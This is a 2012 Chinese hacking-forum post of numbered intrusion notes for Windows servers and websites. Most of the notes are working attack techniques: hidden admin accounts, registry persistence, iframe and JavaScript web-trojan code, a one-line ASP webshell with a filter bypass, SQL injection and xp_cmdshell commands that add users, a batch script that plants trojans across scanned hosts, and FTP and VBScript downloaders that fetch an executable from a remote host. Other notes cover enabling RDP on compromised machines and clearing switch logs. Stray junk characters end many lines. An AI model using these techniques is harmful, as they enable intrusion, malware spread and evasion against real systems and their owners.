找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2255|回复: 0
打印 上一主题 下一主题

一些笔记

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:51:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
+ C, t' L7 e9 Gcacls C:\windows\system32 /G hqw20:R
0 ^, x7 J5 A  F5 K1 F5 `: @( |. l1 n思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
. J" l1 l- l) p% z恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F- D7 s4 T/ T' f$ E3 b: A
, I! X/ ~; X& p, g( D, K
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
8 P! g$ K, B9 A0 L8 |/ L, b3 A
6 o% o7 m& w5 F4 _3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
% f9 V, N6 K5 c/ S, _$ c8 E# C, K: y" H5 e1 j
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
% J: L$ d  p- Y' R! s, W9 t: W' v, A
5、利用INF文件来修改注册表
8 {- V2 Y% C) \1 W9 F" o6 G[Version]( X/ ]$ t* Q( A3 M$ [3 n$ U
Signature="$CHICAGO$"+ a- R& O. W1 k0 x- d
[Defaultinstall]
6 ?) \/ z7 @; H# E: jaddREG=Ating4 s. K1 h. ]" v& U# |9 w6 x
[Ating]7 q+ a2 |6 F1 x1 ]% O
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1", M" ~2 [/ z6 M! a* ^. |  ]* c
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:% Z( Y+ e* [. a4 Q
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径4 v, e$ l! r% t. J2 ~% w0 U5 r& B
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
" e0 q6 |3 `3 h; S( I- wHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
" ]' b' w# G  V1 ?2 C3 h# p! ?HKEY_CURRENT_CONFIG 简写为 HKCC
$ A) N; \2 g- b" K9 _3 d, V: {4 ~0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
* u; }/ j1 d2 m! ^9 b' x"1"这里代表是写入或删除注册表键值中的具体数据! A( |; L+ X3 r9 U3 v- L- v% q) f. P8 @3 Z

: I; l& D9 y6 `+ ], W5 S( R8 p6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,% i( J$ h/ Q. ~- Q' s2 D7 n/ N; A
多了一步就是在防火墙里添加个端口,然后导出其键值9 s" m+ ^; C0 V* |! H2 U" V
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
( B& O5 |: `1 c" W
) \/ V' }# ^& S8 Q7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
" z! R! ^! R% a% z; d在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
* o- J$ C, j+ `' G2 w  r* E
4 k' [7 r1 U1 M1 C& @" m: G8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。! _/ Q% S: O% O0 C5 C9 p( X4 s5 ?

  P. z8 t2 @+ H9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,$ T  l. h$ b( `7 W
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
% s4 _6 L; P1 Z2 b0 Z4 k# @3 L  d( Y& O9 Y6 U! b$ Y
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”& O; @4 g  ], ]6 J3 t
5 U; ]' g1 X) C
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff," i; Q; k' t: S' s
用法:xsniff –pass –hide –log pass.txt
5 z7 L2 [7 Q5 Y8 F. d" Y
# }% h# }. y7 L# i4 ?, L5 x2 N8 r; C12、google搜索的艺术; I$ \, v# Y; A, S
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
- B) a( e- m$ B1 C2 y' W5 ^8 r+ Q或“字符串的语法错误”可以找到很多sql注入漏洞。8 ?6 W3 a6 \9 B* V  v" |# ~4 d

) i: B9 ~+ x  ^& G& l13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
& ^* `1 z6 ]* N8 x( ~$ a
0 w0 C7 h( o, S: A- M; X14、cmd中输入 nc –vv –l –p 1987# o5 Z* o- r$ n. z: a) b
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
& @& v/ D) R( ~4 L# ^& A7 x. {5 a) W( x3 G+ ~
15、制作T++木马,先写个ating.hta文件,内容为! G2 p7 t3 l; q! U' J# j
<script language="VBScript">
% j9 e* E1 o0 o: C: r# c$ Hset wshshell=createobject ("wscript.shell" )2 M' p1 b3 U: x  c1 O6 P0 j' `9 Z
a=wshshell.run("你马的名称",1)
* t  e, x  \% M. Gwindow.close/ N+ G% u6 @$ p: K
</script>6 @% k+ K) X1 V& e7 I
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
0 G1 Y& D& k3 Q2 {4 q9 G9 R; u( |" j1 F8 Z) y* X7 W
16、搜索栏里输入- Q7 n1 m1 }  E- F) _1 Q2 j
关键字%'and 1=1 and '%'='
) ], M! P4 s( E关键字%'and 1=2 and '%'='
7 |( u  ?) K6 {, |6 E4 t& d比较不同处 可以作为注入的特征字符
1 Q* [1 T6 u: E: w
2 \1 u0 [( e, i! X4 S) @17、挂马代码<html>, C9 ^8 j% X# P, b3 X
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>1 K3 D# |1 `& H8 u* O
</html>
3 G- O' b* r! @9 m1 g( A* n- H- ]; U7 l
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆," L, D+ F, v: [7 I, d* \$ _
net localgroup administrators还是可以看出Guest是管理员来。- }- V5 a1 J% U3 Y, c9 \  u) g9 n
2 b: F$ [/ k9 i- n; B
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等2 i' q8 j, p( P: c
用法: 安装: instsrv.exe 服务名称 路径! n9 n. q% j- ^' q" y* C
卸载: instsrv.exe 服务名称 REMOVE% _! H( r, c9 }& e, i8 q

# N% E5 C! f5 r0 [8 ?! s: B1 ?
0 Z" P8 l$ V- e$ h+ M, K( J8 c: B( x21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
. s" A. I! l8 F) v1 \+ u5 f9 ?9 Z# Y不能注入时要第一时间想到%5c暴库。
# s5 r* |3 _. [
1 o$ I7 c1 h5 M" {/ f/ o# L22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
+ U3 H4 ?! }" i
! Z5 Z+ m9 I8 h, e* j23、缺少xp_cmdshell时7 o5 n9 x) s: w) g
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'/ ~4 M* r5 c% r) I, z/ x( w
假如恢复不成功,可以尝试直接加用户(针对开3389的)# ?" I/ `0 S" Y& f0 L3 A" l
declare @o int; i" m3 t) o# @
exec sp_oacreate 'wscript.shell',@o out
, G; k. Z5 R# S6 }3 n4 o/ oexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
6 R# e1 z( d7 ?3 H
6 b# D: J, X+ ^& N( I# \24.批量种植木马.bat) V- F3 `! {7 k) p) H
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中. t) p8 w0 c% s1 d) m+ w
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间7 W, R5 S# V2 v6 K6 ?* u
扫描地址.txt里每个主机名一行 用\\开头$ [" Y" {  b0 n! g( ^8 j

8 v2 O% t5 z5 {+ p$ @1 }25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
7 S5 H- `: X" T1 O8 j, z/ E6 C) g; q$ X( T9 R% V5 y
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名., U; Y2 \' O% R( C5 x
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
2 \) m! j+ I8 c& m/ p3 M4 S7 W$ a# I7 h.cer 等后缀的文件夹下都可以运行任何后缀的asp木马$ P4 C9 S9 o) g7 w" B
$ ?& b: i% [7 `. s6 e- q
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
# S3 n! L" I; l0 u: T9 ]然后用#clear logg和#clear line vty *删除日志5 e: ]7 f6 I/ l3 A" E
0 r0 |( q# Z4 ~8 c
28、电脑坏了省去重新安装系统的方法2 \+ y1 ]( w0 G& O' Z& f( p+ G
纯dos下执行,
4 \/ p- @0 t8 [xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config. {3 i+ y* e, j0 ^+ v% X1 d) U2 ]1 a
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config% G7 U) F' @8 R# m8 u8 P

/ `. L; K: B; A! q* q29、解决TCP/IP筛选 在注册表里有三处,分别是:
9 G3 f2 y, ^6 V9 ^HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip& ]7 {0 B5 u, q! ~
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
+ ?, J1 S- X' N) U( R9 L' g: o* T# kHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip# a  _6 N: H1 E
分别用
* j7 a$ A* T5 b9 n5 t3 xregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
' |8 d9 t& C$ S' a( K3 u' mregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
, P7 D/ [/ |! E- {3 `regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip+ @7 j  {2 i( J: s  J! w3 @9 s
命令来导出注册表项/ h" v: V3 {& Z$ k5 Z
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
7 J& e; |0 H- z, _4 I% Z. b4 Z改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
8 a- l; O9 R6 n. W; |regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。) h. m5 ^0 |8 m
+ i# j; u9 \0 h6 M
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U5 `+ f9 B" H1 b4 E, d8 A$ L- c
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3, M( [# v" F4 `, z' ]! T& P9 X

" c, `3 b! v+ L- o: F31、全手工打造开3389工具2 q8 k' W9 w5 h) f- C. \
打开记事本,编辑内容如下:
+ Z9 ~  _; I8 A5 gecho [Components] > c:\sql) J  p5 h3 \9 Q$ ^
echo TSEnable = on >> c:\sql# y$ o- B# B$ k4 u' r
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q" B! E4 k: Q' y. b
编辑好后存为BAT文件,上传至肉鸡,执行% |# Y( Y& ^4 @8 s6 ~
) B# `+ ~8 b/ F, u: j
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
# d% Q+ ^0 D9 Z/ J$ N' C  G8 j" T1 E: N0 q$ d5 [' k3 I
33、让服务器重启
1 j: M/ ^/ e, j2 b$ w$ y$ C2 k写个bat死循环:7 X; y! H0 z: o" J
@echo off8 a* w6 `8 M1 Z2 c; c0 L; n9 I  b
:loop1
$ ?6 \- F8 m, X$ N4 Bcls& m, T5 h# k, L0 g) v
start cmd.exe
  B* t- }2 t( V( ?& n  u- S8 G7 i) ~goto loop1
* h" S- N/ q& T" R; b保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
! A* I; [6 @3 B
( ~  E/ d" `' `- N, A% i; {34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
; i  x: J4 D  V4 r! R" Y@echo off, C6 S" v" y! a+ p$ c$ C
date /t >c:/3389.txt6 Z3 S# h+ T8 _* l" ]; }
time /t >>c:/3389.txt
2 h! ^7 _  x- Zattrib +s +h c:/3389.bat
' A: I' T8 X( v6 O9 Hattrib +s +h c:/3389.txt
2 p1 }: `, [, p' l( u1 Lnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
: j/ L! r  _6 j6 \( C并保存为3389.bat
( i( m% S( Y7 @打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
7 t! m/ s/ {( \$ b7 y1 P0 x" }
5 K7 x2 V: h1 \! G35、有时候提不了权限的话,试试这个命令,在命令行里输入:$ ^/ H% B  V6 b$ M% j
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页): E$ x& s; T; `0 Q% B( E( p
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。$ h8 r: ]- ^7 z, {7 r# [; R

4 H; M* t2 `/ D. ]3 f7 o9 M( l& v36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
* l- F6 Y: M$ c. y+ J. Wecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
! Q& K/ a/ j% Z( i; {6 b! recho 你的FTP账号 >>c:\1.bat //输入账号' T/ U1 O4 \7 H8 R3 ?
echo 你的FTP密码 >>c:\1.bat //输入密码2 X4 m' N1 |; G9 k
echo bin >>c:\1.bat //登入4 w+ j2 L$ c/ K/ Y# c8 L; a* [6 f
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么: x3 b6 K' a0 c) G  b
echo bye >>c:\1.bat //退出2 @  O6 |# x' @& o
然后执行ftp -s:c:\1.bat即可
3 o" g$ ?& n2 p5 g+ J7 C
2 E' `4 G5 b% k0 c- ]37、修改注册表开3389两法8 M* d4 K+ Y% C
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
2 t, e7 T$ _7 b6 S* s7 W( l7 ]3 pecho Windows Registry Editor Version 5.00 >>3389.reg. `# s( [4 r7 I7 c, J9 j3 l3 M; I
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg/ P4 o" c' g, b
echo "Enabled"="0" >>3389.reg
* u! u/ X* m3 x. R- v5 Fecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
, _+ L) N* ^: N1 e0 b# {% o$ r& _1 uNT\CurrentVersion\Winlogon] >>3389.reg* b. e. d4 }( c) m  J" x! h) \8 Z+ D3 ^
echo "ShutdownWithoutLogon"="0" >>3389.reg2 G+ S) v- l/ b0 f1 M$ I8 e
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]7 }& A. h5 ?2 u% e8 l0 z6 v# G
>>3389.reg
8 Y0 ~* c) C5 z* P1 z) n; S# Iecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg6 i6 N+ M, ^% z4 c2 p
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]. M0 O- P3 S6 z" }" n; ^+ u; s
>>3389.reg: c; [$ R2 S7 O: c) V$ n$ ?
echo "TSEnabled"=dword:00000001 >>3389.reg
/ ?9 X) s" F. s/ Q" jecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg# k$ P$ f+ e( l: K8 U# T: b
echo "Start"=dword:00000002 >>3389.reg2 B, o3 R2 U. }& [& T! Y' \  i
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
7 m, F) D* B" u% C: Z+ p>>3389.reg$ W3 c7 ?2 Z! b/ u
echo "Start"=dword:00000002 >>3389.reg7 Z% |5 U7 A5 F5 |; w1 E1 F
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg" K3 O( {' z& v$ o% R! y
echo "Hotkey"="1" >>3389.reg& V/ Y& f( L0 k
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
. z% k; ^* L" W2 g4 y) `/ qServer\Wds\rdpwd\Tds\tcp] >>3389.reg
. a6 J; l/ D2 F5 F# p! Hecho "PortNumber"=dword:00000D3D >>3389.reg
; U7 t' [0 a, F7 yecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal( U/ {% _! F0 z7 X
Server\WinStations\RDP-Tcp] >>3389.reg
: D; ?1 V9 ~, ~echo "PortNumber"=dword:00000D3D >>3389.reg# P9 X% L" S" W( ?8 C# t" Y
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
9 U8 E% a# g: n- @" Y' R3 y(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
  D; s( o: c( N因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效4 i- d) @) ~4 z/ b
(2)winxp和win2003终端开启+ f  w' Z/ q2 C6 c7 K4 j
用以下ECHO代码写一个REG文件:
. m( g. R* L; f5 Fecho Windows Registry Editor Version 5.00>>3389.reg
* O( ], u, ^6 R/ B; G8 P3 @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
+ i5 ^  t- I: U8 j9 p) G1 qServer]>>3389.reg2 z5 O0 K, A9 z
echo "fDenyTSConnections"=dword:00000000>>3389.reg0 m7 {; J! Q. }: I* n8 \  D
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
0 `' M$ A7 }% n, G# y- B2 gServer\Wds\rdpwd\Tds\tcp]>>3389.reg
; h# T) g, v) b) B3 e( R5 w3 L; jecho "PortNumber"=dword:00000d3d>>3389.reg& O! X- [$ h8 T* m& @% Y, g8 Z
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal9 z1 `$ s( v. D( b$ a
Server\WinStations\RDP-Tcp]>>3389.reg7 |; S, p+ h& p7 }' Z( L* C" Z
echo "PortNumber"=dword:00000d3d>>3389.reg3 o; S" r: \# I, c8 K
然后regedit /s 3389.reg del 3389.reg
: R: D% x* B3 EXP下不论开终端还是改终端端口都不需重启( l; z: y9 ~: Q

8 u6 e1 @7 R/ q& q' C9 D: r38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
' B* L! n. T3 K2 Z用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
( g! ~( v6 m5 l+ S- X. d1 o
/ h7 x/ W9 T4 k  q$ C0 j39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
9 P! R" h% X' h. P(1)数据库文件名应复杂并要有特殊字符2 G! x" G& n4 h+ G: K
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
2 S# M/ R: ]% G1 J/ T. }& R5 |将conn.asp文档中的
" X; e* s5 k4 b7 ]DBPath = Server.MapPath("数据库.mdb")! @' P% s# J! c
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath# H4 X" y" U7 Y  I  |0 x2 r
& X; z& i: W# v
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
/ W% y* Y$ x  ^% n4 r$ @! O5 \7 N(3)不放在WEB目录里
) E) g9 a/ y- Z: K; A2 o) f: x% S0 ~8 R* n  i, w6 p) ^5 ?7 n1 \1 p
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉2 i: S0 k$ _# ]4 ]
可以写两个bat文件
# J9 ^. U; H8 k( X@echo off
+ }6 U# V' b( ~. S, |@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
% A; F8 b& t% d) P' z; g  \. A@del c:\winnt\system32\query.exe
6 r- W/ L" g$ T5 ]  \4 F* E2 @@del %SYSTEMROOT%\system32\dllcache\query.exe7 f. u* H6 w+ q
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的, H( J9 Z, H  T7 H0 J2 ?
6 G. u  [% [# F) b$ p
@echo off4 b9 v2 k8 u& J2 H2 r7 B1 u
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe8 w0 x1 S0 [0 \& ~3 c' ~
@del c:\winnt\system32\tsadmin.exe2 a; u6 D% Y4 `
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
  f! z4 R" k: J! Q2 |/ m2 T  Z
9 O" k; W. U8 `3 L/ R" k( |41、映射对方盘符
, x6 C9 x" B/ v. a9 o8 c  btelnet到他的机器上,
8 j! B  d* z9 |5 e! A0 ?/ pnet share 查看有没有默认共享 如果没有,那么就接着运行
9 x, x% N  |) W7 N2 h& [net share c$=c:7 m0 @  ?7 g6 A
net share现在有c$& J" k& C/ |2 e% N' f& D; e3 ^( r
在自己的机器上运行1 _. T& |% Y! D5 `- u  \" a
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K2 _! Y9 {) m; ], B0 Z6 ?% X4 x

; `# X; @/ h5 W42、一些很有用的老知识" v+ n) R5 ?: Z) T0 w1 J7 Z6 i/ Z
type c:\boot.ini ( 查看系统版本 )
& o+ f* c$ V: r$ b" t% w  L5 Mnet start (查看已经启动的服务)
5 _0 n" `+ f- E. s/ R) L: k7 Vquery user ( 查看当前终端连接 )9 ]% \- g$ p1 l+ M) f/ V. f+ i
net user ( 查看当前用户 )
6 q7 o( w/ O; Qnet user 用户 密码/add ( 建立账号 )% M3 c0 Q2 w* X
net localgroup administrators 用户 /add (提升某用户为管理员)* G% a: P" T1 Z; W, E/ A: n& R
ipconfig -all ( 查看IP什么的 )) A+ J9 Y1 o' L1 `# h& L0 y: e
netstat -an ( 查看当前网络状态 )& x# O8 m) h) D; u
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
4 l/ C, P! y2 T. t克隆时Administrator对应1F4
1 U( ]% S2 d$ K  Y+ j, d% @# E/ B4 `guest对应1F5
3 {* s( P$ g  A+ t0 C  jtsinternetuser对应3E8
; x+ D' Z3 C- ?- I  I9 Q/ j
+ }, h, }; u- V2 m43、如果对方没开3389,但是装了Remote Administrator Service3 }7 M- A0 W* ?7 C0 v
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
- W( p4 K" M. {+ k解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
* Q. ~1 n& p+ S( _1 O, k+ E' y. N先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"( |+ |( @) A- F6 Q
/ \) E1 h% o/ o% m. i* E* G
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)/ \1 i) j! V9 Y# [: x% A
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
/ `. a! b2 K* f
' _0 c" k2 k1 Q) V% O1 u9 q0 w0 c45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)) V; V4 |$ Y0 a
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open$ q/ k1 R: |; W
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
" l3 \( A; F! ~' a  p. e' MCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =: l( ^( x( Z7 J  X3 `5 r" j
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs0 [1 f7 ]1 U) n8 G6 G8 q7 r6 j
(这是完整的一句话,其中没有换行符)
8 \* o4 C, C0 h, ~9 t9 s) |/ ]' _然后下载:
; ^: L! l* D; t! L2 I/ |* Scscript down.vbs http://www.hack520.org/hack.exe hack.exe
7 O" S9 }" D" T; g" k7 V1 m, e; f
46、一句话木马成功依赖于两个条件:) j& @. L. q6 R: D; X
1、服务端没有禁止adodb.Stream或FSO组件- @+ d1 C  v: H3 R
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
: I' w* s, C; A$ [5 X  w0 R8 B" G+ i3 {- N$ @, x
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
2 u" }( o8 q4 ~' D- K9 n;alter database utsz set RECOVERY FULL--
" z3 U8 Y" o& u;create table cmd (a image)--
6 |1 R' M5 Z  a, l( b;backup log utsz to disk = 'D:\cmd' with init--) S5 p% a+ [1 U' V) c* u% n& K) x: g
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--# _' h9 r% p- h' ~" a! H5 y: J
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--2 i' ?. h3 L6 h% N
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。) |/ ~2 ~# c; H2 j5 d5 k
- C/ q; |* b# T7 e, I
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:! ?. J2 U" e# }6 M  o4 A

; j& x; x) V( f6 ^. r! e( I/ N用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options( q5 q: y# o$ D! W* T* N* S/ }# H2 a# p' F
所有会话用 'all'。; L* v9 Y3 n  H7 [& y* M( S
-s sessionid 列出会话的信息。
. J& w- e! r) S& ?  `# N" K-k sessionid 终止会话。+ o9 Z* x0 k5 V2 V! Y
-m sessionid 发送消息到会话。5 j' f' {' \. r( ?; B2 P* s5 N

! `9 G5 G; _4 k3 Vconfig 配置 telnet 服务器参数。: o2 }" N2 c% E0 o9 G' d/ E

0 _* O# D! z) n' d8 p2 ccommon_options 为:5 G3 M5 b* ~4 C$ j9 S2 m  n' \/ M
-u user 指定要使用其凭据的用户  f0 j. ?. \1 m5 X8 y
-p password 用户密码
8 d2 i# E1 D  u# j) W3 n* Z; b- z( L. u3 G) C
config_options 为:
# l4 }1 d9 `, r" \- {dom = domain 设定用户的默认域
1 }* ^# [7 P4 Wctrlakeymap = yes|no 设定 ALT 键的映射/ r/ O- L2 c1 Z* z
timeout = hh:mm:ss 设定空闲会话超时值
5 h3 T( u3 P1 @' ytimeoutactive = yes|no 启用空闲会话。
) |! j9 O2 F: L7 _1 U2 ^maxfail = attempts 设定断开前失败的登录企图数。- U$ p8 J# ?0 Q& l& v" R
maxconn = connections 设定最大连接数。! I" @" U3 @7 I( X  Q, i
port = number 设定 telnet 端口。
8 i8 @! t  e6 |% G3 W6 Z# q' Isec = [+/-]NTLM [+/-]passwd4 v7 G( y9 e; O4 M
设定身份验证机构+ q0 P$ |; l. X1 A8 ]$ Q: v6 ]# X. A
fname = file 指定审计文件名。
$ ?6 }7 r# M! f3 K  h/ d2 }& Wfsize = size 指定审计文件的最大尺寸(MB)。% `0 l& k* X0 F. d9 g
mode = console|stream 指定操作模式。
6 o8 I3 V3 @- L2 [2 j6 P4 Mauditlocation = eventlog|file|both
; k0 Y: c  |1 _/ {7 W. s  c指定记录地点: Y( ?: m6 e/ |, }" W6 }/ `+ `, {' r
audit = [+/-]user [+/-]fail [+/-]admin% F4 }1 `3 q, _" E3 a) ]! ?6 l

' Q) X3 m( b2 c# K! r! X! r3 e7 y49、例如:在IE上访问:1 @5 n- H/ x# {1 L6 [. b8 }
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/3 }( n. x9 ]/ k. h) W
hack.txt里面的代码是:) I% @$ Y3 y, c! E4 u2 c& b7 S
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
1 ?7 F2 d+ l0 R把这个hack.txt发到你空间就可以了!
" E3 _+ Y7 y0 ^4 ?8 N  d% l这个可以利用来做网马哦!
6 u; P# d" W  _: l: O- [
1 E/ ^9 E: p# Y. W* b" T1 \: R; H- o7 \& Y50、autorun的病毒可以通过手动限制!
+ d& V% Y2 D6 o0 m6 o/ \& m1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
1 O. j) m0 l& h1 G3 I& R2,打开盘符用右键打开!切忌双击盘符~
' `. i9 T8 |1 F) d6 w3 G# m3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!. S0 @! E8 P2 @+ P# s" Z1 U5 ]
